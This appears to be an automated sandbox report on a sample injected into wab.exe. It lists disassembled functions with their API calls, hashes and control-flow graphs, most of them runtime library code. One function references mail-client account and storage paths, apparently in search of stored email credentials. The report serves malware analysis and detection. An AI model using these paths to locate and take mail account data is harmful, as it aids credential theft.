                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 0d9c57c9f1c2049d12b0501f63e40539c736bfe0e3d2e0f5c19999e69c06d8e7
                                                              • Instruction ID: e0b3cb2238ac5283509686fe6f79b80ebc7e5a148945909399cf12cc3bd18cc4
                                                              • Opcode Fuzzy Hash: 0d9c57c9f1c2049d12b0501f63e40539c736bfe0e3d2e0f5c19999e69c06d8e7
                                                              • Instruction Fuzzy Hash: 8641F435E00208ABCF14DF78C880A8EBBB5BF55228F0881DDD914AB291D731EA05CBE1
                                                              Function 23D7925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 23D79221: _free.LIBCMT ref: 23D7924A
                                                              • _free.LIBCMT ref: 23D792AB
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D792B6
                                                              • _free.LIBCMT ref: 23D792C1
                                                              • _free.LIBCMT ref: 23D79315
                                                              • _free.LIBCMT ref: 23D79320
                                                              • _free.LIBCMT ref: 23D7932B
                                                              • _free.LIBCMT ref: 23D79336
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 91d9c975f4e4c4e31b3f05567ad2fc41bc59c524cb72bdc12bbed77578e9fe7f
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: C1114F72640B08EAD670FBB0DC45FCB7BBE9F58700FC1086DA69976052DA75B6048662
                                                              Function 23D78821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 415 23d78821-23d7883a 416 23d78850-23d78855 415->416 417 23d7883c-23d7884c call 23d79341 415->417 418 23d78857-23d7885f 416->418 419 23d78862-23d78886 MultiByteToWideChar 416->419 417->416 427 23d7884e 417->427 418->419 421 23d7888c-23d78898 419->421 422 23d78a19-23d78a2c call 23d72ada 419->422 424 23d788ec 421->424 425 23d7889a-23d788ab 421->425 431 23d788ee-23d788f0 424->431 428 23d788ad-23d788bc call 23d7bf20 425->428 429 23d788ca-23d788db call 23d756d0 425->429 427->416 435 23d78a0e 428->435 442 23d788c2-23d788c8 428->442 429->435 443 23d788e1 429->443 434 23d788f6-23d78909 MultiByteToWideChar 431->434 431->435 434->435 436 23d7890f-23d7892a call 23d75f19 434->436 437 23d78a10-23d78a17 call 23d78801 435->437 436->435 447 23d78930-23d78937 436->447 437->422 446 23d788e7-23d788ea 442->446 443->446 446->431 448 23d78971-23d7897d 447->448 449 23d78939-23d7893e 447->449 451 23d7897f-23d78990 448->451 452 23d789c9 448->452 449->437 450 23d78944-23d78946 449->450 450->435 453 23d7894c-23d78966 call 23d75f19 450->453 455 23d78992-23d789a1 call 23d7bf20 451->455 456 23d789ab-23d789bc call 23d756d0 451->456 454 23d789cb-23d789cd 452->454 453->437 468 23d7896c 453->468 459 23d78a07-23d78a0d call 23d78801 454->459 460 23d789cf-23d789e8 call 23d75f19 454->460 455->459 471 23d789a3-23d789a9 455->471 456->459 467 23d789be 456->467 459->435 460->459 473 23d789ea-23d789f1 460->473 472 23d789c4-23d789c7 467->472 468->435 471->472 472->454 474 23d789f3-23d789f4 473->474 475 23d78a2d-23d78a33 473->475 476 23d789f5-23d78a05 WideCharToMultiByte 474->476 475->476 476->459 477 23d78a35-23d78a3c call 23d78801 476->477 477->437
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23D76FFD,00000000,?,?,?,23D78A72,?,?,00000100), ref: 23D7887B
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23D78A72,?,?,00000100,5EFC4D8B,?,?), ref: 23D78901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 23D789FB
                                                              • __freea.LIBCMT ref: 23D78A08
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              • __freea.LIBCMT ref: 23D78A11
                                                              • __freea.LIBCMT ref: 23D78A36
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 710ff0001c2b7407d692f5c462206627eb91417a35000fb4e8b17bce94af398f
                                                              • Instruction ID: 8cb932d9a1ae5d69b1211f972b5461606b1d31aceb95e2dc1a2a88b9883e1ede
                                                              • Opcode Fuzzy Hash: 710ff0001c2b7407d692f5c462206627eb91417a35000fb4e8b17bce94af398f
                                                              • Instruction Fuzzy Hash: 59510472A50246AFDB259E60CC42EBF77BAFF50A50F1406ADFD04D6180EB34DC50C6A1
                                                              Function 23D715DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _strlen.LIBCMT ref: 23D71607
                                                              • _strcat.LIBCMT ref: 23D7161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,23D7190E,?,?,00000000,?,00000000), ref: 23D71643
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D7165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,23D7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23D71661
                                                              • lstrcatW.KERNEL32(00001008,?), ref: 23D71686
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 2dcf0b71e20b2587b3f215993036dbda3d866a2cc2ab3434d135d704b30e2319
                                                              • Instruction ID: 2886827e243b4481dc3e546e8bd81b4aac757a828e5392ea81f37d73b110e479
                                                              • Opcode Fuzzy Hash: 2dcf0b71e20b2587b3f215993036dbda3d866a2cc2ab3434d135d704b30e2319
                                                              • Instruction Fuzzy Hash: B321F532A00304ABCB119BA4DC85EEE77B8EF98710F24405FE504AB185EB74A54687B5
                                                              Function 23D71000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23D7104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23D71061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23D71075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23D71090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 23D710B8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: c26615638e008ade0c93b745c78a224029476f59a398a6444a80f7bcfb64f750
                                                              • Instruction ID: 5c8483ee2208a07b1423563dd3b3a18386bb3270e7f966481d25f694a60be330
                                                              • Opcode Fuzzy Hash: c26615638e008ade0c93b745c78a224029476f59a398a6444a80f7bcfb64f750
                                                              • Instruction Fuzzy Hash: EF2181369003289BCF20EB61DC48EDB377CEF44254F14429AE969971A5DA30DA9ACB50
                                                              Function 23D73856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,23D73518,23D723F1,23D71F17), ref: 23D73864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23D73872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 23D7388B
                                                              • SetLastError.KERNEL32(00000000,?,23D73518,23D723F1,23D71F17), ref: 23D738DD
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: c617d3c216270b36459f334e6d090906acedfd450898052bad5061d6fb7c20b0
                                                              • Instruction ID: ebc27c3de4f759dd384360853856ad2e6f4a796fde70842fef4872a7e5c0eeb5
                                                              • Opcode Fuzzy Hash: c617d3c216270b36459f334e6d090906acedfd450898052bad5061d6fb7c20b0
                                                              • Instruction Fuzzy Hash: BA014C336587115FE3123A79AC889062B7CDF25A7173003BEE114580D1EF25D81283D4
                                                              Function 23D75AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,23D76C6C), ref: 23D75AFA
                                                              • _free.LIBCMT ref: 23D75B2D
                                                              • _free.LIBCMT ref: 23D75B55
                                                              • SetLastError.KERNEL32(00000000,?,?,23D76C6C), ref: 23D75B62
                                                              • SetLastError.KERNEL32(00000000,?,?,23D76C6C), ref: 23D75B6E
                                                              • _abort.LIBCMT ref: 23D75B74
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: f251bd7cfbdcb0201da8e0836620082d34a45bee914f5bd33e91286010d56442
                                                              • Instruction ID: a02b5384355d8befda96dc156db800deae340c77d36c158967f46c54bc1f0a00
                                                              • Opcode Fuzzy Hash: f251bd7cfbdcb0201da8e0836620082d34a45bee914f5bd33e91286010d56442
                                                              • Instruction Fuzzy Hash: 7BF0A437514600ABD25336346C4CF6A2A7BCBE1971B2901ADF918A6181FE248512C177
                                                              Function 23D711EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,?,?,?,23D710DF,?,?,?,00000000), ref: 23D71E9A
                                                                • Part of subcall function 23D71E89: lstrcatW.KERNEL32(?,?), ref: 23D71EAC
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EB3
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EC8
                                                                • Part of subcall function 23D71E89: lstrcatW.KERNEL32(?,23D710DF), ref: 23D71ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 23D7122A
                                                                • Part of subcall function 23D7173A: _strlen.LIBCMT ref: 23D71855
                                                                • Part of subcall function 23D7173A: _strlen.LIBCMT ref: 23D71869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: f0eb57ea4aa450b8063104e831bb20f86a6874d8e19545a72d678af88e12bb6b
                                                              • Instruction ID: b503a7a81d9fdb6340186e49b14245051389b92e8fbe62df6943281cafb21a4e
                                                              • Opcode Fuzzy Hash: f0eb57ea4aa450b8063104e831bb20f86a6874d8e19545a72d678af88e12bb6b
                                                              • Instruction Fuzzy Hash: 3221E9B9E103186AE72097E4DC81FED7339EF50714F00168AF604EB1D4E6B16E868768
                                                              Function 23D74B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23D74AEA,?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000), ref: 23D74B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23D74B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,23D74AEA,?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082), ref: 23D74B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: e3e77e3977425919221f4554f5b3b580c0cbb5a40e3b5c49da2dfca29db346ae
                                                              • Instruction ID: 3e5d2f712c81a9d36799d42166350583dc1abcfbb8cbf105f1e3fced1d6b9499
                                                              • Opcode Fuzzy Hash: e3e77e3977425919221f4554f5b3b580c0cbb5a40e3b5c49da2dfca29db346ae
                                                              • Instruction Fuzzy Hash: 4CF06232A00218BFDB12BFA0CC4CF9DBFB9EF54751F0041A9F905A6190EB34AD55CA94
                                                              Function 23D77153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 23D7715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 23D7717F
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 23D771A5
                                                              • _free.LIBCMT ref: 23D771B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 23D771C7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 740fad2a858eee93a56717be6edf20eb9a5c10301f694f58ccbcac761db3e0e2
                                                              • Instruction ID: 4978391c9c1f3f8c9bd551a0f0aa881d00dfd7ea8c8f866bfd47c278670ecffa
                                                              • Opcode Fuzzy Hash: 740fad2a858eee93a56717be6edf20eb9a5c10301f694f58ccbcac761db3e0e2
                                                              • Instruction Fuzzy Hash: EB01A773602315BFA7212AB64C8CD7B6A7DDFD2DA031415AFBD04C7240EE648C0682B5
                                                              Function 23D75B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,23D7636D,23D75713,00000000,?,23D72249,?,?,23D71D66,00000000,?,?,00000000), ref: 23D75B7F
                                                              • _free.LIBCMT ref: 23D75BB4
                                                              • _free.LIBCMT ref: 23D75BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D75BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D75BF1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 939af0ebba06146ab35abdd998e5f0097158f993ac897d9b93b57c3eecf682f6
                                                              • Instruction ID: 05925518617817da1523e0373655500622d5c8f921d5ae529deaa02f5bb5b248
                                                              • Opcode Fuzzy Hash: 939af0ebba06146ab35abdd998e5f0097158f993ac897d9b93b57c3eecf682f6
                                                              • Instruction Fuzzy Hash: A301F47B114701ABD61336345C88F2B2A7F9BE197072401EDF819A6182FE28D912C137
                                                              Function 23D71E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,23D710DF,?,?,?,00000000), ref: 23D71E9A
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71EAC
                                                              • lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EB3
                                                              • lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EC8
                                                              • lstrcatW.KERNEL32(?,23D710DF), ref: 23D71ED3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: e694e33add18df97b392ccb762c3051bc224ff524627b6611af4f75d10c295ff
                                                              • Instruction ID: c0103af6d1335e02beb27381188f1a96956cd131af2dd7f1f52e503be5e26075
                                                              • Opcode Fuzzy Hash: e694e33add18df97b392ccb762c3051bc224ff524627b6611af4f75d10c295ff
                                                              • Instruction Fuzzy Hash: E2F082271102107AE621372AAC85EBF7B7CFFD6A60B44001EFA0893190AB59585292B9
                                                              Function 23D791B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 23D791D0
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D791E2
                                                              • _free.LIBCMT ref: 23D791F4
                                                              • _free.LIBCMT ref: 23D79206
                                                              • _free.LIBCMT ref: 23D79218
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 380ba6b6585a89ad88c4c5e70eeee93ac3b735c43f7f2c04dea76ec7f554538f
                                                              • Instruction ID: bf991f6e8281804139bf93dd33e3230e81f5a8334cc66c45937beb4a0ad101e2
                                                              • Opcode Fuzzy Hash: 380ba6b6585a89ad88c4c5e70eeee93ac3b735c43f7f2c04dea76ec7f554538f
                                                              • Instruction Fuzzy Hash: 0BF01D73525640AB8664FB58EAC5D5A7BFAEB64B207A4088DF909D7500CB34F8808A68
                                                              Function 23D75351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 23D7536F
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D75381
                                                              • _free.LIBCMT ref: 23D75394
                                                              • _free.LIBCMT ref: 23D753A5
                                                              • _free.LIBCMT ref: 23D753B6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: afd0413743019f5ad1e29aee5c3a2973e2cd963cb5c2ae4c7f25aa302791757b
                                                              • Instruction ID: 962599aa95c7238f86001512bdd594250d1e3ce96c1f1ac1a1465deef3109d65
                                                              • Opcode Fuzzy Hash: afd0413743019f5ad1e29aee5c3a2973e2cd963cb5c2ae4c7f25aa302791757b
                                                              • Instruction Fuzzy Hash: 88F0FEBAD35225DBC7127F2599805483BB6FB78B20306058EF81897264DB39B943DBD2
                                                              Function 23D74BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 23D74C1D
                                                              • _free.LIBCMT ref: 23D74CE8
                                                              • _free.LIBCMT ref: 23D74CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                              • API String ID: 2506810119-3377118234
                                                              • Opcode ID: 48fbfd310e10610c140197ebb5b64989aa160199a6be19bc127ffce53ebc5405
                                                              • Instruction ID: 14248b45365929347ad720a22c1d12f5615f42d234f3a62e2072ef2b75c30be8
                                                              • Opcode Fuzzy Hash: 48fbfd310e10610c140197ebb5b64989aa160199a6be19bc127ffce53ebc5405
                                                              • Instruction Fuzzy Hash: D1312F75F00358AFDB22DB998980D9EBBFCEB95710B1440DEF90497210E675AA41CBA1
                                                              Function 23D786E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23D76FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23D78731
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 23D787BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 23D787CC
                                                              • __freea.LIBCMT ref: 23D787D5
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 83bf9734d33f3b344e730902b2f18fb9f3722949a0d975ee00af5898744963cd
                                                              • Instruction ID: 5fa2d0269db807cf448656219ea1b32f84029c5f2414f017718dbebe2b0d4ce8
                                                              • Opcode Fuzzy Hash: 83bf9734d33f3b344e730902b2f18fb9f3722949a0d975ee00af5898744963cd
